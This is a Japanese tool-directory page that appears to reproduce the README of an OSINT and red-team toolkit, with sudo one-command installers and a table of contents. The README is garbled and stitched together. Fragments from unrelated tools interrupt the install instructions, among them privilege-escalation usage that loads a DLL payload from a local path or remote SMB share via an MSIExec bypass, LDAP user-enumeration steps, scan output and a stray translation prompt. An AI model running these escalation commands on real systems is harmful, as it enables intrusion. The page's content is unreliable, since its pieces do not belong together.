Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
awesome-osint-arsenal — OSINT & 偵察ツールキット // 100以上のツール、ワンコマンドインストーラー、SOCMINT、GEOINT、ネットワーク偵察、ダークウェブ、フォレンジックなど | Kitploit
ツール/GitHubGitHub/rawfilejson/awesome-osint-arsenal
OSINT (オープンソースインテリジェンス)偵察フォレンジック情報収集デジタルフォレンジックCTFペネトレーションテスト学習と教育レッドチーミング厳選リソースラボと実践
GitHub
1.7k2621221ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
rawfilejson/awesome-osint-arsenal

awesome-osint-arsenal

OSINT & 偵察ツールキット // 100以上のツール、ワンコマンドインストーラー、SOCMINT、GEOINT、ネットワーク偵察、ダークウェブ、フォレンジックなど

リポジトリを見る
OSINT Arsenal

🔍 素晴らしいOSINTアーセナル

究極のオープンソースインテリジェンス+セキュリティツールキット


Tools Categories Version Updated Stars


751以上のツール · 50のカテゴリ · マルチディストリビューションインストーラ · ジョージアOSINT · Termux対応

インターネット上で最も包括的なOSINTおよびセキュリティツールキット — すべてのツールにインストール手順または確認済みリンク付き。

Buy Me a Coffee


⚡ ワンコマンドですべてを入手```bash

git clone https://github.com/rawfilejson/awesome-osint-arsenal && cd awesome-osint-arsenal && sudo bash install.sh

### 🎯 または必要なものだけを選ぶ```bash
sudo bash osint.sh        # 🔍 OSINT only (Sherlock, Maigret, Amass, …)

Please provide the Markdown content to translate.```bash sudo bash redteam.sh # ⚔️ Red team (Sliver, BloodHound, Mimikatz, Nuclei, …)

(空)```bash
sudo bash blueteam.sh     # 🛡️  Blue team (Wazuh, Sigma, Suricata, Velociraptor, …)

使用方法: (フラグなし)

EoP.exe

Cobalt Strike XSL バージョン 20220511 のみサポートされています。

使用方法: --service

EoP.exe --service

これは lfsvc サービスを安全でない方法で作成し、net start で開始した後、RpcRemoteFindFirstFile RPC 呼び出しを介して悪意のある XSL パスをサービスに送信します。

MSIExec

管理者権限が必要: はい
ローカル: はい
リモート: いいえ

手順:

  1. アセンブリをディスクまたは SMB 共有にドロップします。
  2. MSIExec バイパスを実行します。

使用方法: --msiexec:

EoP.exe --msiexec

これは C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ から DLL ペイロードを読み込みます。

使用方法: ローカル DLL (--msiexec --local-dll)

EoP.exe --msiexec --location /root/kitploit/payload.dll

これはディスク上のローカルパスから DLL を読み込みます。必要に応じて ..\..\..\ のパス トラバーサルが必要になることに注意してください。

使用方法: リモート DLL (--msiexec --remote-dll)

リモート読み込みの場合、リッスンしている SMB サーバーがあることを確認してください。

EoP.exe --msiexec --location \\127.0.0.1\shared\kitploit_payload.dll

@_EthicalChaos_ の研究に基づいています。

Service Control Manager

リモート: いいえ
ローカル: いいえ```bash sudo bash forensics.sh # 🔬 DFIR + RE (Volatility, Ghidra, radare2, …)

### 🔗 インターネットに公開されているエンドポイント

| エンドポイント                        | 重要度 |
|---------------------------------|----------|
| `/hub`                          | クリティカル |
| `/portainer`                    | 高     |
| `/`                             | 高     |

> Shodanを使用してインターネットに直接公開されている重要なエンドポイントはありません。

### 👨‍💻 ブラウザ情報の漏洩

[*] URL: http://towel.blinkenlights.nl/ [VPN] false [Bot] false [User Agent] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 [Plugins] Pdf Viewer, Chrome PDF Viewer, Chromium PDF Viewer, Microsoft Edge PDF Viewer, WebKit built-in PDF [Screen] 3440x1440 [Imgs] true [Cookie] true [Session] true [Java] false [Flash] false [Languages] en-US [CPU Cores] 24 [Memory] 8 GB


> 機密性の高いブラウザデータは漏洩していません。```bash
sudo bash hardware.sh     # 🔌 Hardware + SDR (binwalk, hackrf, openocd, …)

│ │ ├── [1.3.13] LDAP(ポート389)

│ │ │ ├── LDAP匿名ログオン発見:LDAPサーバーに対して匿名LDAPクエリを実行し、ベースネーミングコンテキストを取得します。これにより、ターゲットのドメイン構造が明らかになる可能性があります。

│ │ │ ├── LDAP匿名クエリ:LDAPサーバーに対して匿名クエリを実行し、ユーザー、グループ、コンピューターを列挙します。この手法は、認証なしで機密性の高いディレクトリ情報を明らかにすることがよくあります。

│ │ │ └── LDAPバインドユーザー列挙:LDAPバインド試行を通じて有効なユーザー名を列挙します。シンプル認証方式とNTLM認証方式の両方をサポートします。これにより、クレデンシャルベースの攻撃を受けやすいユーザーを特定するのに役立ちます。```bash sudo bash labs.sh # 🎓 Vulnerable apps for practice (DVWA, Juice Shop, …)

### セットアップ - リポジトリとエージェント

1. リポジトリをクローンします:```bash
bash termux.sh            # 📱 Android (Termux subset, no sudo needed)

Kali, Debian, Ubuntu, Parrot, Mint, Pop!_OS で動作(推奨: apt) Arch / Manjaro / Fedora / RHEL では一部対応(自動検出、git/pip/go にフォールバック) Android では Termux サブセット



[!IMPORTANT]

🙏 フォークする前にご一読ください

このリポジトリには 50カテゴリにわたる751のツール があります。リンクやインストールコマンド、毎週追加される新ツールを最新に保つのは、一人では 大変 です。

誰も手伝わなければ、このリストの一部は古くなります。 それが現実です。

30秒でできる貢献方法:

  • ⭐ リポジトリにスターを付ける(スターが多いほど、貢献者が見つけやすくなります)
  • 🐛 リンク切れを見つけましたか? Issueを開いてください。1分で終わります。
  • ☕ コーヒーをご馳走 いただければ、週末もこの作業に充てられます。
  • 📢 共有する — TwitterやDiscordなど、セキュリティコミュニティが集まる場所で。

何か壊れていたら: 文句を言うだけでなく、IssueまたはPRを開いてください。そうすることで、このリポジトリは役立ち続けます。


[!WARNING] 免責事項: このリポジトリは教育目的および許可されたセキュリティ研究のみを対象としています。 自分が所有していないシステムをテストする前に、必ず書面による許可を得てください。 著者は、ここにリストされたツールや技術の誤用について責任を負いません。 詳細は下部の法的免責事項をご覧ください。


📋 目次

🔭 偵察 & 発見 — クリックして展開
  1. 1. ユーザー名 & ソーシャルメディアOSINT
  2. 2. メールOSINTツール
  3. 3. 電話番号OSINT
  4. 4. ドメイン & IP OSINT
  5. 5. 地理位置情報 & 地図OSINT
  6. 6. 画像 & 動画OSINT
  7. 7. 顔認識 & 人物検索
  8. 8. ソーシャルメディアモニタリング
💥 データ漏洩 & 流出 — クリックして展開
  1. 9. データ漏洩 & 流出検索エンジン
  2. 10. WikiLeaks, DDoSecrets & 内部告発プラットフォーム
  3. 11. パスワードクラック & 認証情報ツール
🕶️ ダークウェブ & プライバシー — クリックして展開
  1. 12. ダークウェブ検索エンジン & ツール
  2. 13. 匿名化 & プライバシーツール
⚔️ 攻撃セキュリティ(許可されたテストのみ) — クリックして展開
  1. 14. WebアプリケーションOSINT & スキャニング
  2. 15. ソーシャルエンジニアリング & フィッシング
  3. 16. 脆弱性スキャン & エクスプロイト
  4. 17. ネットワーク & 無線ツール
  5. 18. モバイルハッキング & 電話エクスプロイト
🧠 インテリジェンス & 分析 — クリックして展開
  1. 19. AI搭載OSINT & 無料AIツール
  2. 20. 金融 & 企業インテリジェンス
  3. 21. 車両, 不動産 & 公開記録
  4. 22. メタデータ & デジタルフォレンジック
👁️ 監視 & ドーキング — クリックして展開
  1. 23. IPカメラ & ウェブカメラOSINT
  2. 24. Google Dorkingバイブル
  3. 25. 認証情報 & データDorking
  4. 26. IP追跡 & 地理位置情報リンク
🌐 コミュニティ & プラットフォーム — クリックして展開
  1. 27. Telegram OSINTボット & チャンネル
  2. 28. ロシアOSINT & 人物検索サービス
  3. 29. ソーシャルメディア検索プラットフォーム
ツールをダウンロード